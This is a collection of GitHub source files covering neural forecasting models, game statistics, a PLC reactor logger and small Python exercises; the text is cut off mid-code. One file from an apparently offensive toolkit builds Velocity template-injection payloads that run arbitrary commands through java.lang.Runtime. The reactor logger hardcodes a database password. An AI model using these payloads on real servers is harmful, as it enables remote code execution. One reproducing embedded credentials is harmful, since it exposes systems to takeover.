nn.ModuleList([nn.Linear(int(hidden_size / input_dim), hidden_size) for _ in range(3)]).to(\r\n device)\r\n self.attention = Attention()\r\n self.att_linear = nn.Linear(hidden_size * input_dim, 1).to(device)\r\n # MLP\r\n self.mlp_layer = nn.Sequential(\r\n nn.Linear((length - 1) * input_dim, input_dim),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(input_dim, input_dim),\r\n # nn.ReLU(inplace=True)\r\n ).to(device)\r\n self.mlp_layer_c1 = nn.Sequential(\r\n nn.Linear(input_dim, input_dim),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(input_dim, 1))\r\n # CNN_LSTM\r\n self.conv1 = nn.Conv1d(in_channels=input_dim, out_channels=8, kernel_size=3, padding=1).to(device)\r\n self.conv2 = nn.Conv1d(in_channels=8, out_channels=8, kernel_size=3, padding=1).to(device)\r\n self.conv3 = nn.Conv1d(in_channels=8, out_channels=8, kernel_size=3, padding=1).to(device)\r\n self.cnn_lstm = nn.LSTM(input_dim + 8, hidden_size, batch_first=True).to(device)\r\n self.cnn_lstm_linear = nn.Linear(hidden_size, 1).to(device)\r\n self.leakyrelu = nn.LeakyReLU().to(device)\r\n # Casual\r\n self.conv1d = nn.Conv1d(in_channels=input_dim, out_channels=32, kernel_size=3, padding=2, dilation=1)\r\n self.conv1d_1 = nn.Conv1d(in_channels=32, out_channels=32, kernel_size=3, padding=2, dilation=1)\r\n # padding =(kernel_size-1)*dilation)\r\n self.casual_lstm = nn.LSTM(32, hidden_size, num_layers, batch_first=True).to(device)\r\n self.casual_mlp = nn.Sequential(\r\n nn.Linear((length - 1) * hidden_size, hidden_size),\r\n nn.ReLU(inplace=True),\r\n nn.Linear(hidden_size, 1)\r\n ).to(device)\r\n\r\n def forward(self, diff_before_result):\r\n if self.model == 'LSTM':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n train_before_output, _ = self.lstm(train_before_data)\r\n # train_before_output = self.lstm_linear(train_before_output[:, -1, :])\r\n train_before_output = train_before_output.reshape(diff_before_result.shape[0], -1)\r\n # train_after_output = train_after_output.reshape(diff_flip_after_result.shape[0], -1)\r\n # train_before_output = self.lstm_mlp(train_before_output)\r\n # train_after_output = self.lstm_mlp(train_after_output)\r\n # output = (train_before_output + train_after_output) / 2\r\n # output = train_after_output\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1]\r\n elif self.model == 'Transformer':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n bc = train_before_data.shape[0]\r\n # train_after_data = diff_flip_after_result[:, :-1, :]\r\n train_before_output = self.transformer_layer(train_before_data)\r\n # train_after_output = self.transformer_layer(train_after_data)\r\n # train_before_output = self.transformer_linear(train_before_output[:, -1, :])\r\n train_before_output = self.transformer_mlp(train_before_output.reshape(bc, -1))\r\n # train_after_output = self.transformer_linear(train_after_output[:, -1, :])\r\n # output = (train_before_output + train_after_output) / 2\r\n output = train_before_output\r\n # output = train_after_output\r\n return output, diff_before_result[:, -1:, -1]\r\n elif self.model == 'LSTM_att':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n # train_after_data = diff_flip_after_result[:, :-1, :]\r\n train_before_output, _ = self.lstm(train_before_data)\r\n # train_after_output, _ = self.lstm(train_after_data)\r\n output = train_before_output\r\n # output = train_after_output\r\n # output = train_before_output + train_after_output\r\n B, L, H = output.shape[0], output.shape[1], output.shape[2]\r\n x = output.reshape(B, L, 
self.input_dim, int(H / self.input_dim))\r\n query, key, value = [l(x) for l, x in zip(self.linear_layers, (x, x, x))]\r\n att_x, attn = self.attention(query, key, value, dropout_value=0.1)\r\n att_x = att_x.reshape(B, L, self.input_dim * H)\r\n output = self.att_linear(att_x[:, -1, :])\r\n return output, diff_before_result[:, -1:, -1]\r\n elif self.model == 'Seq2Seq':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n e_input = train_before_data\r\n e_output, e_h_c = self.encoder(e_input)\r\n d_input = train_before_data\r\n d_h_c = e_h_c\r\n d_output, d_h_c = self.decoder(d_input, d_h_c)\r\n train_before_output = self.S2S_mlp(d_output[:, -1, :])\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1]\r\n elif self.model == 'MLP':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n bc = train_before_data.shape[0]\r\n hidden_1 = self.mlp_layer(train_before_data.reshape(bc, -1))\r\n hidden = self.normalize(hidden_1)\r\n train_before_output = self.mlp_layer_c1(hidden_1)\r\n # train_before_output = self.mlp_layer(train_before_data.reshape(bc, -1))\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1], hidden\r\n elif self.model == 'CNN_LSTM':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n cnn_out1 = self.conv1(train_before_data.transpose(1, 2))\r\n cnn_out2 = self.conv2(cnn_out1)\r\n cnn_out3 = self.conv3(cnn_out2)\r\n M1_data = cnn_out3.transpose(1, 2)\r\n M1_data = torch.cat((train_before_data, M1_data), dim=2)\r\n train_before_output, _ = self.cnn_lstm(M1_data)\r\n bc = train_before_output.shape[0]\r\n c1 = self.gru_c1(train_before_output.reshape(bc, -1))\r\n c1 = self.normalize(c1)\r\n train_before_output = self.gru_c2(c1)\r\n # train_before_output = self.cnn_lstm_linear(train_before_output[:, -1, :])\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1], c1\r\n elif self.model == 'GRU':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n train_before_output, _ = self.gru(train_before_data)\r\n bc = train_before_output.shape[0]\r\n c1 = self.gru_c1(train_before_output.reshape(bc, -1))\r\n c = self.normalize(c1)\r\n train_before_output = self.gru_c2(c)\r\n # train_before_output = self.gru_mlp(train_before_output.reshape(bc, -1))\r\n # train_before_output = self.gru_linear(train_before_output[:, -1, :])\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1], c\r\n elif self.model == 'BiLSTM':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n cnn_out = self.conv1d(train_before_data.transpose(1, 2))\r\n cnn_out = self.conv1d_1(cnn_out)\r\n cnn_out = cnn_out[:, :, :-self.conv1d_1.padding[0]]\r\n cnn_out = cnn_out[:, :, :-self.conv1d.padding[0]].transpose(1, 2)\r\n train_before_output, _ = self.bilstm(train_before_data)\r\n # train_before_output = self.bilstm_linear(train_before_output[:, -1, :])\r\n bc = train_before_data.shape[0]\r\n train_before_output = self.bilstm_mlp(train_before_output.reshape(bc, -1))\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1]\r\n elif self.model == 'CausalConv1d_LSTM':\r\n train_before_data = diff_before_result[:, :-1, :]\r\n cnn_out = self.conv1d(train_before_data.transpose(1, 2))\r\n cnn_out = self.conv1d_1(cnn_out)\r\n cnn_out = cnn_out[:, :, :-self.conv1d_1.padding[0]]\r\n cnn_out = cnn_out[:, :, :-self.conv1d.padding[0]].transpose(1, 2)\r\n train_before_output, _ = self.casual_lstm(cnn_out)\r\n bc = train_before_output.shape[0]\r\n train_before_output = 
self.casual_mlp(train_before_output.reshape(bc, -1))\r\n output = train_before_output\r\n return output, diff_before_result[:, -1:, -1]\r\n\r\n def normalize(self, x):\r\n buffer = torch.pow(x, 2)\r\n normp = torch.sum(buffer, 1).add_(1e-10)\r\n normalization_constant = torch.sqrt(normp)\r\n output = torch.div(x, normalization_constant.view(-1, 1).expand_as(x))\r\n return output\r\n","repo_name":"liuguoxiao/test","sub_path":"contrastive/Model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"39472157226","text":"class velocity:\n def __init__(self):\n self.name = \"velocity\"\n self.exec = True\n self.download = False\n\n def payload_test(self):\n return [\"#set ($run=347*21) $run\"]\n\n def execu(self,cmd,index=-1):\n payload = [\n '''#set($engine=\"\")\n#set($run=$engine.getClass().forName(\"java.lang.Runtime\"))\n#set($runtime=$run.getRuntime())\n#set($proc=$runtime.exec(\"'''+cmd+'''\"))\n#set($null=$proc.waitFor())\n#set($istr=$proc.getInputStream())\n#set($chr=$engine.getClass().forName(\"java.lang.Character\"))\n#set($output=\"\")\n#set($string=$engine.getClass().forName(\"java.lang.String\"))\n#foreach($i in [1..$istr.available()])\n#set($output=$output.concat($string.valueOf($chr.toChars($istr.read()))))\n#end\n${output}\n '''\n ]\n if index >= 0:\n return payload[index]\n return payload\n\n","repo_name":"rea1bacon/H4cX","sub_path":"Tools/Templatemap/velocity.py","file_name":"velocity.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"4360994250","text":"from math import cos, sin\nimport numpy as np\nfrom typing import Tuple\n\n\n# inputs: \nVECTOR_RADIUS = 20\n\n# example\ndesired_speed = np.array([0,VECTOR_RADIUS])\nwind_speed = np.array([-5, 0])\n\n\n# wind 2d orthogonal and projection\ndef get_projection_and_orthogonal_vector(v1: np.ndarray, v2: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:\n v_projection = v1 * np.dot(v1, v2) / np.dot(v1, v1)\n v_orthogonal = v2 - v_projection \n return v_projection, v_orthogonal\n\nwind_projection, wind_orthogonal = get_projection_and_orthogonal_vector(desired_speed, wind_speed)\n\n# request speed\n\ndef get_desired_speed_coefficient(desired_dir_vector, orthogonal_vector, final_vector_size): \n '''\n || alpha * desired_dir_vector || ^ 2 + || orthogonal_vector || ^ 2 = || final_vector_size || ^ 2 \n '''\n alpha = np.sqrt((final_vector_size ** 2 - np.linalg.norm(orthogonal_vector) ** 2 ) / np.linalg.norm(desired_dir_vector) ** 2 )\n return alpha\n\ndef get_compensated_vector_and_desired_vector_coefficient(desired_vector: np.ndarray, wind_vector: np.ndarray, final_vector_size: float) -> Tuple[np.ndarray, float]: \n desired_vector_coeff = get_desired_speed_coefficient(desired_speed, -wind_orthogonal, VECTOR_RADIUS)\n compensated_vector = desired_vector_coeff * desired_speed - wind_orthogonal \n return compensated_vector, desired_vector_coeff\n\nrequest_speed, desired_speed_coeff = get_compensated_vector_and_desired_vector_coefficient(desired_speed, wind_speed, VECTOR_RADIUS)\n \n\n\n\n# print results: 
\nprint(wind_orthogonal)\nprint(desired_speed_coeff)\nprint(request_speed)\nprint(np.linalg.norm(request_speed))\n","repo_name":"osforlife42/wind_compensation","sub_path":"wind_compensation_calcs.py","file_name":"wind_compensation_calcs.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"34410427269","text":"import pandas as pd \nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\nimport math\nimport wordninja\n\n\n#reads dataset in from kaggle into pandas\nlol_data=pd.read_csv(\"data/high_diamond_ranked_10min.csv\")\n\n\n#separates data based on team color\nred_data=lol_data.drop(['gameId','blueWins', 'blueWardsPlaced', 'blueWardsDestroyed',\n 'blueFirstBlood', 'blueKills', 'blueDeaths', 'blueAssists',\n 'blueEliteMonsters', 'blueDragons', 'blueHeralds',\n 'blueTowersDestroyed', 'blueTotalGold', 'blueAvgLevel',\n 'blueTotalExperience', 'blueTotalMinionsKilled',\n 'blueTotalJungleMinionsKilled', 'blueGoldDiff', 'blueExperienceDiff',\n 'blueCSPerMin', 'blueGoldPerMin'], axis=1)\nblue_data=lol_data.drop(['gameId','blueWins','redWardsPlaced', 'redWardsDestroyed', 'redFirstBlood', 'redKills',\n 'redDeaths', 'redAssists', 'redEliteMonsters', 'redDragons',\n 'redHeralds', 'redTowersDestroyed', 'redTotalGold', 'redAvgLevel',\n 'redTotalExperience', 'redTotalMinionsKilled',\n 'redTotalJungleMinionsKilled', 'redGoldDiff', 'redExperienceDiff',\n 'redCSPerMin', 'redGoldPerMin'], axis=1)\n\n\n\n#creates Dataframe of pvalues and t statistics\ntstats=[]\npvals=[]\nfor idx in range(len(red_data.columns)):\n tstat, pval=stats.ttest_ind(red_data.iloc[:,idx], blue_data.iloc[:,idx])\n tstats.append(round(tstat,4))\n pvals.append(round(pval,4))\nnew_names=[]\nfor col in red_data.columns:\n new_names.append(col[3:])\ndf=pd.DataFrame(list(zip(tstats, pvals)), index=new_names, columns=[\"T-stat\", \"P-value\"])\nttest=df.to_markdown()\n\n\n\n\n#graphs normal distributions\nfor idx in range(len(red_data.columns)):\n fig1, ax1=plt.subplots(1,1, figsize=(12,7))\n rmean=red_data.iloc[:,idx].mean()\n bmean=blue_data.iloc[:,idx].mean()\n red_dist=stats.norm(rmean, red_data.iloc[:,idx].std())\n blue_dist=stats.norm(bmean, blue_data.iloc[:,idx].std())\n x_range=np.linspace(red_dist.ppf(0.01), red_dist.ppf(0.99),101)\n ax1.plot(x_range, red_dist.pdf(x_range), color=\"red\")\n ax1.plot(x_range, blue_dist.pdf(x_range), color=\"blue\")\n ax1.set_title(label=' '.join(wordninja.split(red_data.columns[idx][3:])))\n ax1.set_xlabel(f\" {' '.join(wordninja.split(red_data.columns[idx][3:]))}\")\n ax1.set_ylabel(\"Percentile\")\n ax1.axvline(red_dist.mean(), color=\"red\", linestyle=':')\n ax1.axvline(blue_dist.mean(), color=\"blue\", linestyle=':')\n ax1.text(0.35,0.2,f\" Red Mean: {round(rmean, 3)} Blue Mean: {round(bmean, 3)} \", transform=plt.gca().transAxes)\n plt.show()\n\n \n\n\n\n\n\n\n","repo_name":"dsouzaj98/LOL-Resources","sub_path":"src/lol_data.py","file_name":"lol_data.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"2487382265","text":"from threading import Thread\nimport time\nfrom datetime import datetime\nfrom pycomm3 import LogixDriver, SLCDriver\nimport pyodbc\n\nfrom model import ReportModel, PhaseBitOfReactor, BatchModel\n\n\nclass ReactorEndBit(Thread):\n\n def __init__(self, reactor_id, down_time_tag,reactor_name, 
tag_value_tag,bit_tag_label,tag_label,device_IP,reactor_index,device_id):\n super().__init__()\n self.end_bit_tag = bit_tag_label + \".Complete\"\n self.rector = reactor_name\n self.running = bit_tag_label + \".Running\"\n self.batch_number_tag = tag_label + \".BatchHeader.BatchNumber\"\n self.end_time_tag = tag_label + \".BatchHeader.BatchEndTime\"\n self.product_name_tag = tag_label + \".BatchHeader.ProductName\"\n self.phase_count_tag=bit_tag_label+\".TotalSteps\"\n self.start_time_tag = tag_label + \".BatchHeader.BatchStartTime\"\n self.reactor_name_tag = tag_label + \".BatchHeader.UnitName\"\n self.ip = device_IP\n self.down_time_tag=down_time_tag\n self.tag_label=tag_label\n self.device_id=device_id\n self.connection = pyodbc.connect('Driver={SQL Server};'\n 'Server=DESKTOP-0I611GM\\SQLEXPRESS;'\n 'Database=NewWeb1;'\n 'UID=sa;'\n 'PWD=Servilink@123;')\n self.cursor = self.connection.cursor()\n\n def dateFormate(self,string_date):\n datedata = string_date.split(\"/\")\n timedata = datedata[3].split(\":\")\n datetime2 = datetime(int(datedata[2]), int(datedata[1]), int(datedata[0]), int(timedata[0]), int(timedata[1]),\n int(timedata[2]))\n\n return datetime2\n\n def endBit(self):\n # try:\n while True:\n # print(\"endbit\")\n # print(\"ip\", self.ip)\n with LogixDriver(self.ip) as plc:\n print(\"connection\", plc.connected)\n data = plc.read(self.running)\n print(\"Enddata\", data)\n if (data[1] == False):\n batchNumber = plc.read(self.batch_number_tag)\n reactorName = plc.read(self.reactor_name_tag)\n productName = plc.read(self.product_name_tag)\n start_time = plc.read(self.start_time_tag)\n batchStratTime = self.dateFormate(str(start_time[1]))\n phaseCount = plc.read(self.phase_count_tag)\n end_time = plc.read(self.end_time_tag)\n batchEndTime = self.dateFormate(str(end_time[1]))\n\n countofbatch=BatchModel().find_by_batch_id_and_unitname(batchNumber[1],reactorName[1])\n\n if(countofbatch==None):\n\n\n BatchModel().insert(batchStratTime,batchEndTime, productName[1], batchNumber[1], reactorName[1],self.device_id)\n\n for j in range(phaseCount[1]):\n actual=plc.read(self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseData[0].Actual\")\n print(\"actual\",actual[1])\n print(\"actualtag\", self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseData[0].Actual\")\n pe=plc.read(self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseHeader.EndTime\")\n #print(\"pe\", pe)\n phaseEndtime=self.dateFormate(pe[1])\n #print(\"phaseEndtime\", phaseEndtime)\n setPoint=plc.read(self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseData[0].Setpoint\")\n print(\"setPoint\", setPoint[1])\n print(\"setPointtag\", self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseData[0].Setpoint\")\n\n ps=plc.read(self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseHeader.StartTime\")\n\n phaseStarttime=self.dateFormate(ps[1])\n #print(\"phaseStarttime\", phaseStarttime)\n phaseName=plc.read(self.tag_label+\".PhaseReport\"+\"[\"+str(j)+\"]\"+\".PhaseHeader.Name\")\n #print(\"phaseName\",phaseName[1])\n if(len(setPoint) !=0 or len(actual) !=0):\n ReportModel().insert(batchNumber[1],phaseName[1],phaseStarttime,phaseEndtime,setPoint[1],actual[1],reactorName[1],self.device_id)\n\n\n time.sleep(1)\n # except:\n # print(\"except\")\n # self.endBit()\n def run(self) -> None:\n 
self.endBit()\n\n\n\n","repo_name":"synfoit/WebMasterConnect","sub_path":"ReactorEndbit.py","file_name":"ReactorEndbit.py","file_ext":"py","file_size_in_byte":4633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7275017300","text":"#Importo librerias de la catedra\nimport sympy as sp\nimport pytc2.cuadripolos as tc2\nfrom pytc2.general import print_latex\n\n#Verificacion simbolica ej 2\n\ns = sp.symbols('s', complex = True)\nZ1, Z3 = sp.symbols('L1 L3', complex = True)\nY1 = 1/(s*Z1)\nY2 = s*sp.symbols('C2', complex = True)\nY3 = 1/(s*Z3)\nR = sp.symbols('R', real = True, positive = True)\nG = 1/R\n\n#MAI \n\nMAI = sp.Matrix([\n [Y1, -Y1, 0, 0],\n [-Y1, Y1+Y2+Y3, -Y2, -Y3],\n [0, -Y2, Y2 + G, -G],\n [0, -Y3, -G, Y3 + G]\n ])\n\ncon_detalles = True\n\n#Verifico transferencia\ntf = tc2.calc_MAI_vtransf_ij_mn(MAI, 2, 3, 0, 2, verbose = con_detalles)\n\nprint('Cálculo de la transferencia')\nprint_latex('T(s) = ' + sp.latex(tf))\n\n#Reemplazo valores para obtenerla normalizada\ntf_n = sp.simplify(tf.subs(Z1, 3/2))\ntf_n = sp.simplify(tf_n.subs(Y2, s*(4/3)))\ntf_n = sp.simplify(tf_n.subs(Z3, 1/2))\ntf_n = sp.simplify(tf_n.subs(R, 1))\n\nprint_latex('T(s) = ' + sp.latex(tf_n))\n\n#Verifico impedancia de entrada\ncon_detalles = False\nZe = tc2.calc_MAI_impedance_ij(MAI, 0, 2, verbose = con_detalles)\nprint('Cálculo de la impedancia de entrada')\nprint_latex('Ze(s) = ' + sp.latex(Ze))","repo_name":"fabhri01/tc2","sub_path":"python/ts6.py","file_name":"ts6.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"42949748941","text":"from sys import exit\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n 決定性有限オートマトンを定義して語の判別を行う\r\n \"\"\"\r\n lang_21 = Automaton_elem(\r\n \"pqrd\", # 状態\r\n \"ab\", # アルファベット\r\n [ # 動作関数\r\n [\"p\", \"a\", \"q\"],\r\n [\"p\", \"b\", \"d\"],\r\n [\"q\", \"a\", \"q\"],\r\n [\"q\", \"b\", \"r\"],\r\n [\"r\", \"a\", \"d\"],\r\n [\"r\", \"b\", \"r\"],\r\n [\"d\", \"a\", \"d\"],\r\n [\"d\", \"b\", \"d\"],\r\n ],\r\n \"p\", # 初期状態\r\n \"r\", # 受理状態\r\n )\r\n if lang_21.is_define() == 1:\r\n print(\"The automaton isn't correct.\")\r\n exit(1)\r\n # print('self.states: ', lang_21.states)\r\n # print('self.chars: ', lang_21.chars)\r\n # print('self.mv_func: ', lang_21.mv_func)\r\n # print('self.init_state: ', lang_21.init_state)\r\n # print('self.acce_state: ', lang_21.acce_state)\r\n # print('self.now_state: ', lang_21.now_state)\r\n word = \"aabb\"\r\n print(\">> word:\", word)\r\n if lang_21.state_transiton(word) == 0:\r\n print(\"This word is L_21.\")\r\n else:\r\n print(\"This word is NOT L_21.\")\r\n print(\"-------------------------\")\r\n word = \"aabbaabb\"\r\n print(\">> word:\", word)\r\n if lang_21.state_transiton(word) == 0:\r\n print(\"This word is L_21.\")\r\n else:\r\n print(\"This word is NOT L_21.\")\r\n print(\"-------------------------\")\r\n word = \"aacbb\"\r\n print(\">> word:\", word)\r\n if lang_21.state_transiton(word) == 0:\r\n print(\"This word is L_21.\")\r\n else:\r\n print(\"This word is NOT L_21.\")\r\n print(\"-------------------------\")\r\n return 0\r\n\r\n\r\nclass Automaton_elem:\r\n \"\"\"\r\n 決定性有限オートマトン\r\n \"\"\"\r\n\r\n def __init__(\r\n self,\r\n state_str: str,\r\n char_str: str,\r\n mv_func_array: list,\r\n init_state_str: str,\r\n acce_state_str: str,\r\n ) -> None:\r\n \"\"\"\r\n コンストラクタ\r\n \"\"\"\r\n self.states = set(state_str) # 状態の有限集合(Q)\r\n self.chars = set(char_str) # 
アルファベット(Σ)\r\n self.mv_func = mv_func_array # 動作関数(Q, Σ) = Q -> [Q, Σ, Q](2次元配列)\r\n self.init_state = init_state_str # 初期状態(文字1つ, Qに属する)\r\n self.acce_state = set(acce_state_str) # 受理状態(Qの部分集合)\r\n self.now_state = init_state_str # 遷移中の状態(Qに属する)\r\n\r\n def init_now_state(self):\r\n \"\"\"\r\n self.now_stateを初期化する\r\n \"\"\"\r\n self.now_state = self.init_state # 初期状態に戻す\r\n\r\n def is_define(self) -> int:\r\n \"\"\"\r\n オートマトンが正しく定義されているかの確認\r\n 正しく定義されていれば0を返す(他は1を返す)\r\n \"\"\"\r\n tmp_states = [] # 状態\r\n tmp_chars = [] # アルファベット\r\n for i in self.mv_func: # 動作関数から状態とアルファベットを取り出す\r\n tmp_states.append(i[0]) # Q\r\n tmp_chars.append(i[1]) # Σ\r\n tmp_states.append(i[2]) # Q\r\n if (\r\n # (受理状態 ⊆ 状態の有限集合) ∧ (初期状態 ⊆ 状態の有限集合)\r\n (self.acce_state <= self.states)\r\n and (set(self.init_state) <= self.states)\r\n and\r\n # (動作関数から取り出した状態 == 状態の有限集合) ∧ (動作関数から取り出したアルファベット == アルファベット)\r\n (set(tmp_states) == self.states)\r\n and (set(tmp_chars) == self.chars)\r\n ):\r\n return 0\r\n else:\r\n return 1\r\n\r\n def is_alphabet(self, txt: str):\r\n \"\"\"\r\n 文字列がアルファベットに属しているかを判別する\r\n 文字列 ⊆ アルファベットであれば0を返す\r\n \"\"\"\r\n if set(txt) <= self.chars:\r\n return 0\r\n else:\r\n return 1\r\n\r\n def is_accept(self) -> int:\r\n \"\"\"\r\n 状態遷移をさせた結果、受理状態であるかを判断する\r\n 状態(now_state)が受理状態であれば0を返す\r\n \"\"\"\r\n if set(self.now_state) <= self.acce_state:\r\n return 0\r\n else:\r\n return 1\r\n\r\n def state_transiton(self, words: str) -> int:\r\n \"\"\"\r\n 動作関数を用いて状態遷移を行う\r\n 語(words)が受理可能であれば0を返す\r\n \"\"\"\r\n self.init_now_state() # 初期化\r\n if self.is_alphabet(words):\r\n return 1 # 入力文字列 <= アルファベットでない\r\n for w in words: # 語を頭から順に取り出す\r\n for i in range(len(self.mv_func)): # 動作関数に当てはめていく\r\n if (self.mv_func[i][0] == self.now_state) and (self.mv_func[i][1] == w):\r\n self.now_state = self.mv_func[i][2] # 状態遷移\r\n print(\r\n \"({0}, {1}) = {2}\".format(\r\n self.mv_func[i][0], self.mv_func[i][1], self.mv_func[i][2]\r\n )\r\n ) # ログ\r\n break\r\n return self.is_accept()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"guy-nth/Automaton_practice","sub_path":"automaton_01.py","file_name":"automaton_01.py","file_ext":"py","file_size_in_byte":5320,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"4864228688","text":"from .IObserver import IObserver\nfrom .ISubject import ISubject\nfrom .IDisplayElement import IDisplayElement\n\n\nclass ForecastDisplay(IObserver, IDisplayElement):\n def __init__(self, weather_data: ISubject):\n self._weather_data = weather_data\n self._weather_data.register_observer(self)\n self._display_message = [\"天候は良くなります!\", \"より寒く雨模様の天候に注意してください\", \"ほとんど同じです\"]\n self._counter = 0\n\n def update(self, temp, humidity, pressure):\n _ = humidity\n _ = pressure\n _ = temp\n self.display()\n\n def display(self):\n print(f\"予報: {self._display_message[self._counter]}\")\n if self._counter > 2:\n self._counter = 0\n else:\n self._counter += 1\n","repo_name":"S-Tatsuya/DesignPattern","sub_path":"Pattern/Observer/HeadFirst/src/ForecastDisplay.py","file_name":"ForecastDisplay.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"3027168426","text":"import datetime\nimport math\nimport string\nfrom abc import ABC\nimport sys\nfrom typing import Dict, List\n\nimport constants\nimport utils\n\n\nclass Memory:\n OFFSET_BITS = int(math.log2(constants.BLOCK_SIZE))\n BLOCK_BITS = 
int(math.log2(constants.TOTAL_BLOCKS))\n\n def __init__(self, total_size=constants.TOTAL_MEMORY_SIZE) -> None:\n self.space_used = 0\n self.total_size = int(total_size)\n self.memory: List[List[int]] = [[0] * constants.BLOCK_SIZE\n for _ in range(constants.TOTAL_BLOCKS)]\n\n # addr -> size\n # addr [4 bits for block number, 6 bits for offset]\n self.allocations: Dict[int, int] = {}\n self.used_per_allocation: Dict[int, int] = {}\n self.free_blocks = [i for i in range(constants.TOTAL_BLOCKS)]\n\n def allocate(self, size: int):\n if self.space_used + size > self.total_size:\n raise ValueError('Not enough space in memory')\n\n if size > constants.MAX_FILE_SIZE:\n raise ValueError(\n f'File size too large (max {constants.MAX_FILE_SIZE} bytes)')\n\n if len(self.free_blocks) == 0:\n raise ValueError('No free blocks available')\n\n block = self.free_blocks.pop(0)\n addr = block << self.OFFSET_BITS\n\n self.allocations[addr] = size\n self.used_per_allocation[addr] = 0\n self.space_used += size\n\n return addr\n\n def read_file(self, addr: int, starting_byte=0, num_bytes=None):\n size = self.allocations[addr]\n if num_bytes is None:\n num_bytes = self.used_per_allocation[addr]\n\n block = addr >> self.OFFSET_BITS\n offset = addr & ((2 ** self.OFFSET_BITS) - 1)\n\n return self.memory[block][offset + starting_byte:offset + starting_byte + num_bytes]\n\n def truncate(self, addr: int, new_size: int):\n if new_size > self.allocations[addr]:\n raise ValueError('New size must be smaller than current size')\n\n self.allocations[addr] = new_size\n self.used_per_allocation[addr] = min(\n self.used_per_allocation[addr], new_size)\n\n def write_file(self, addr: int, data: List[int]):\n size = self.allocations[addr]\n if len(data) > size:\n addr = self.reallocate(addr, len(data))\n\n block = addr >> self.OFFSET_BITS\n offset = addr & ((2 ** self.OFFSET_BITS) - 1)\n\n # self.memory[block][offset:len(data)] = data\n self.memory[block] = self.memory[block][:offset] + \\\n data + self.memory[block][offset + len(data):]\n self.used_per_allocation[addr] = len(data)\n return addr\n\n def append_file(self, addr: int, data: List[int]):\n new_addr = addr\n previous_data_length = self.used_per_allocation[addr]\n if previous_data_length + len(data) > self.allocations[addr]:\n new_addr = self.reallocate(addr, previous_data_length + len(data))\n\n previous_data = self.read_file(addr, 0, previous_data_length)\n return self.write_file(new_addr, previous_data + data)\n\n def move_within_file(self, addr: int, starting_byte: int, content_length: int, writing_byte: int):\n if starting_byte + content_length > self.allocations[addr]:\n raise ValueError(\n 'Starting byte + content length must be less than or equal to file size')\n\n if writing_byte + content_length > self.allocations[addr]:\n raise ValueError(\n 'Writing byte + content length must be less than or equal to file size')\n\n block = addr >> self.OFFSET_BITS\n offset = addr & ((2 ** self.OFFSET_BITS) - 1)\n\n data = self.read_file(addr, starting_byte,\n starting_byte + content_length)\n\n self.memory[block][offset + writing_byte:offset +\n writing_byte + content_length] = data\n\n return addr\n\n def reallocate(self, addr: int, new_size: int):\n if self.space_used - self.allocations[addr] + new_size > self.total_size:\n raise ValueError('Not enough space in memory')\n\n self.deallocate(addr)\n return self.allocate(new_size)\n\n def deallocate(self, addr: int):\n size = self.allocations.get(addr, None)\n if size is None:\n return\n\n block = addr >> self.OFFSET_BITS\n 
self.free_blocks.append(block)\n self.space_used -= size\n del self.allocations[addr]\n del self.used_per_allocation[addr]\n\n def get_free_space(self):\n return self.total_size - self.space_used\n\n def show_memory_map(self, outfile=sys.stdout):\n print(\"Memory Map:\", file=outfile)\n print(\"Free Blocks:\", self.free_blocks, file=outfile)\n for i, (addr, size) in enumerate(self.allocations.items()):\n print(\n f\"Allocation#{i+1} | Block#{addr >> self.OFFSET_BITS} Address: {hex(addr)}, Size: {size}, Used: {self.used_per_allocation[addr]}\", file=outfile)\n\n def show_memory_layout(self, outfile=sys.stdout):\n print(\"Memory Layout:\", file=outfile)\n for i, block in enumerate(self.memory):\n print(f\"Block {i}: {block}\", file=outfile)\n\n def __dict__(self):\n return {\n 'space_used': self.space_used,\n 'total_size': self.total_size,\n 'allocations': self.allocations,\n 'used_per_allocation': self.used_per_allocation,\n 'memory': self.memory,\n }\n\n @classmethod\n def from_dict(cls, data):\n memory = cls(data['total_size'])\n memory.space_used = 